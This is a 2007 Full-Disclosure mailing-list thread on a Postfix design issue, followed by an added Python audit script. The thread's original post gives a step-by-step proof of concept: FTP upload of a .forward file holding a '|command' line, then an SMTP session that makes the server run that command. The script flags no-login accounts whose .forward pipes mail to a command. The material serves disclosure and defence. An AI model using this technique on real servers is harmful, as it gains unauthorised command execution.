
Re: [Full-disclosure] Small Design Bug in Postfix - REMOTE



No, the idea is that you are a user with no login access, only FTP.
By doing this, you get shell access (with sane privileges, thankfully) when
you're supposed to only have FTP.

On Dec 13, 2007 2:34 PM, Fredrick Diggle <fdiggle@xxxxxxxxx> wrote:

> You have write perms on a user's home directory and this was the best way
> you could come up with to execute commands? Please send me details on your
> recipe for boiled water. Be sure to gzip it though as I imagine it is
> several pages long.
>
> YAY!
>
>
> On Dec 13, 2007 2:18 PM, kcope <kingcope@xxxxxxx> wrote:
>
> > Small Design Bug in Postfix - REMOTE
> >
> > There's a small issue on how Postfix forwards mails.
> > A user can have a .forward file in her home directory.
> > Inside this file she can specify an alternative recipient
> > or use aliasing to execute commands when mail is received.
> > From the manpage ALIASES(5):
> > "aliases - Postfix local alias database format"
> >
> > |command
> >              Mail is piped into command. Commands  that  contain
> >              special  characters,  such as whitespace, should be
> >              enclosed between double quotes.  See  local(8)  for
> >              details of delivery to command.
> >
> >              When the command fails, a limited amount of command
> >              output is mailed back  to  the  sender.   The  file
> >              /usr/include/sysexits.h  defines  the expected exit
> >              status codes. For example, use "|exit 67" to  simu-
> >              late  a  "user  unknown"  error,  and  "|exit 0" to
> >              implement an expensive black hole.
> >
> > This is fine since postfix properly drops privileges before
> > executing the command.
> > The problem with executing commands via .forward files is that
> > if someone manages to place a file into one's home directory and
> > just sends a file to the mailserver she can execute commands
> > even when she's not supposed to or does not have the privileges.
> >
> > Here is an example exploitation session, the user 'rootkey'
> > only has ftp access with write permissions and no other privileges than
> > that.
> >
> > Login to FTP server
> > >telnet box 21
> > >USER rootkey
> > >PASS rootkey123
> > <logged in
> >
> > Put .forward file with following contents into the home directory of
> > user 'rootkey'.
> >
> > ---snip---
> > |touch /tmp/XXX
> > ---snip---
> >
> > >put .forward
> >
> > Now send an email to user rootkey.
> >
> > >telnet box 25
> > >mail from: rootkey
> > >rcpt to: rootkey
> > >data
> > >.
> >
> > RESULT:
> >
> > kcope@box:~$ ls /tmp/testXXX
> > /tmp/testXXX
> >
> >
> > signed,
> >
> > - -kcope/2007
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
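
A defender-side check for the condition discussed in this thread, added here as an example and not part of the original posts: it lists accounts whose login shell denies interactive access but whose ~/.forward contains a |command destination. The shell list, function names and sample accounts are assumptions constructed for illustration.

```python
import os
import re
import tempfile

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}  # assumed list
DEST = re.compile(r'(?:"[^"]*"|[^,"])+')  # one destination; quoted commas do not split

def pipe_commands(forward_text):
    """Return the |command destinations found in .forward content."""
    cmds = []
    for line in forward_text.splitlines():
        items = (m.strip().strip('"') for m in DEST.findall(line))
        cmds += [i for i in items if i.startswith("|")]
    return cmds

def audit(passwd_text):
    """Return (user, command) pairs for no-login accounts whose ~/.forward runs a command."""
    findings = []
    for entry in passwd_text.splitlines():
        f = entry.split(":")
        if len(f) != 7 or f[6] not in NOLOGIN_SHELLS:
            continue
        try:
            with open(os.path.join(f[5], ".forward"), errors="replace") as fh:
                findings += [(f[0], c) for c in pipe_commands(fh.read())]
        except OSError:
            pass  # no .forward, or not readable
    return findings

def demo():
    """Constructed sample accounts in a temporary tree; returns the audit findings."""
    root, passwd = tempfile.mkdtemp(), []
    samples = [  # (user, shell, .forward content or None), all constructed
        ("rootkey", "/usr/sbin/nologin", "|touch /tmp/XXX\n"),
        ("alice", "/bin/false", 'bob@example.com, "|/usr/bin/vacation alice"\n'),
        ("carol", "/bin/bash", "|/usr/bin/procmail\n"),
        ("dave", "/usr/sbin/nologin", None),
    ]
    for user, shell, fwd in samples:
        home = os.path.join(root, user)
        os.makedirs(home)
        if fwd is not None:
            with open(os.path.join(home, ".forward"), "w") as fh:
                fh.write(fwd)
        passwd.append(f"{user}:x:1000:1000::{home}:{shell}")
    return audit("\n".join(passwd))

if __name__ == "__main__":
    print(demo())
```

On a real host, pass the contents of /etc/passwd to `audit()`. Postfix's `allow_mail_to_commands` parameter (default `alias, forward`) controls whether .forward files may deliver to commands at all.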